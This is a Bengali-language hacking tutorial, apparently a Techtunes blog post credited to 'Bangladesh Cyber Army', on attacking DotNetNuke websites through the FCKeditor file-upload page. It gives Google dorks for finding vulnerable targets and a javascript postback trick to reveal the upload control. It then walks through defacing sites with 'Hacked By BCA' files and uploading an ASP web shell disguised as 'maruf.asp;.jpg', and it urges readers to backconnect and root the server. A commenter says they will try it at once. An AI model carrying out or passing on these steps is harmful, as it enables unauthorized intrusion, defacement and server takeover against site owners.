DNN হল মাইক্রোসফট এর এসপি (ASP) প্রোগ্রামিং ল্যাংগুয়েজ এর একটা বাগ (Bug).এর সম্পুর্ন নামঃ Dot Net Nuke। এর মাধ্যমে আমরা ফাইল/শেল আপলোড করতে পারব।
না, যে সকল সাইট এই Vulnerable সে সকল সাইট হ্যাক করা যাবে। অনেক সাইট এ Hackable.
মামু আছে না! মামু থাকতে চিন্তা নাই। আমি কয়েকটা ডর্ক দিচ্ছি যা দিয়ে সহজেই Vulnerable সাইট বের করতে পারবেন।
inurl:/portals/0
inurl:Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
inurl:"Fck/fcklinkgallery.aspx"
এখন রেজাল্ট এর একটা সাইটএ ক্লিক করুন
আপনি এইরকম দেখতে পাবেন
আপনি এইরকম দেখতে পাবেন. অথবা
http://আপনারসাইট/HtmlEditorProviders/Fck/fcklinkgallery.aspx
এখন ৩নং অপশনটি[File(A File On Your Site)] সিলেক্ট করুন।
এখন ব্রাউজার এর এড্রেসবার এর লিখুন
javascript:__doPostBack(‘ctlURL$cmdUpload’,”)
কোন এক কারোনে জাভাস্রিপ্টটা কাজ করছে না তারা এইখান থেকে জাভাস্রিপ্টটা ডাউনলোড করে নিন http://www.mediafire.com/?irruu15qetlebuj
এইপ্রজন্ত এসে থামুন।
এখন যে সাইট হ্যাক করবেন ওই সাইটে যান নতুন একটি ট্যাব খুলে।
মানে, আপনি ধরেন এখন http://demo4x.com সাইটটি হ্যাক করবেন। ওইখানের হোমপেজ এ যান। তারপর যেকোন একটা ইমেজ এ Right বাটন এ ক্লিক করুন।
এন্টার এ চাপ দিন। এখন নতুন একটি অপশন দেখতে পাবেন
তারপর দেখবেন “Open Image In New Tab” এই খানে ক্লিক করুন। মানে ইমেজটি নতুন একটি ট্যাব এ ওপেন করুন। এখন খেয়াল করুন ইমেজ টি কি নামে আছে। এখন আপনি Photoshop/Gimp দিয়ে একটা ইমেজ বানিয়ে ফেলুন। Hacked By BCA !! (আপনার ইচ্ছামত) ইমেজটি সেভ করবেন ওই ইমেজের নামে যে নামে ইমেজটি সাইটে আছে। ব্যাস এখন আবার আগের জায়গায় ফিরে যান। যে নতুন অপশনটি আসছিল ওইখানে গিয়ে আপলোড করুন। এখন সাইটের হোমপেজ এ গিয়ে দেখুন আগের ইমেজটি নেই, আপনার ইমেজটি আছে(!) হয়ে গেল হ্যাক
আগের মত ই STOP প্রজন্ত আসুন । এখন নতুন যে অপশনটি আসছে ওইটাতে ক্লিক করে একটা SWF/TXT/JPG/GIF/DOC/PDF ফাইল আপলোড করুন। অবশ্যই ফাইলে লেখা থাকবে Hacked By BCA.
এই ব্যাপারে SWF ফাইল হলে ই ভাল হয় অনেক সুন্দর করতে পারবেন।
SWF ফাইল বানানোর জন্য অনেক সফট পাবেন। মামুর কাছেই জিজ্ঞেস করুন। http://google.com
তারপর আপলোড করার পর এই ঠিকানায় যান
http://আপনারভিক্টিম.com/portals/0/আপনারফাইল.swf
কিছু কিছু যায়গায় portals/0 কাজ করবে না। এই সময় ওই সাইটের একটা ইমেজ নতুন ট্যাব এ ওপেন করে দেখুন কি পোর্টাল এ আছে।
শেষ, হয়ে গেল হ্যাক
আগের মতই STOP প্রজন্ত আসুন। তারপর নতুন আপশনটি তে ক্লিক করে একটা শেল আপলোড করুন। এখান থেকে ASP শেলটি ডাউনলোড করুন তারপর আপলোড করুন। কিন্তু আপনাকে সরাসরি ASP ফাইল আপলোড করতে দিবে নাL এই জন্য ট্রিকস ব্যাবহার করতে হবে। J আপনার শেল টা রিনেম করুন লিখুন maruf.asp;.jpg
এখন আপলোড করুন দেখুন আপলোড করতে দিচ্ছে। ওহ আপনাকে অবশ্যই ASP শেল ব্যাবহার করতে হবে। PHP শেল কিন্তু কাজ করবে না।
শেল আপলোড হয়ে গেলে এইখানে যান
http://ভিক্টিম.com/portals/0/maruf.asp;.jpg
“ভিক্টিম” এর জায়গায় আপনার Hackable সাইটের নাম লিখবেন।
তারপর পেয়ে যাবেন শেল একসেস। ইয়া ইয়া হুপুরা সাইট আপনার কট্রলে । তেমন ক্ষতি করবেন না। আর যারা একটু Advance তারা Backconnect দিয়ে সার্ভার Root করে ফেলুন।
আর অবশ্যই মন্তব্য করবেন। আপনাদের এই মন্ত্যবের জন্যই এত কষ্ট করে টিউন লেখা।
টিউন করার তেমন সময় পাই না তারপরও করতে বসলাম। শুধুমাত্র আপনাদের জন্য। ধন্যবাদ সবাইকে। এর পরো না পারলে এই বইটা পড়ুন বাংলা। এই টিউনেরই পিডিএফ
এই টিউনটি বাংলাদেশ সাইবার আর্মি এর অনুমতি ছাড়া অন্য কোথাও কপি পাস্ট করা যাবে না।
আমি মারুফ আলাম। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 13 বছর 10 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 16 টি টিউন ও 296 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 1 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।
uid=0(root) gid=0(root) groups=0(root)
এতো সোজা হ্যাক করা? এখনি ট্রাই মারতাছি। অনেক অনেক অনেক থ্যাঙ্কস ফর শেয়ার। যদি না পারি থ্যঙ্কস ফেরত দিবেন 😀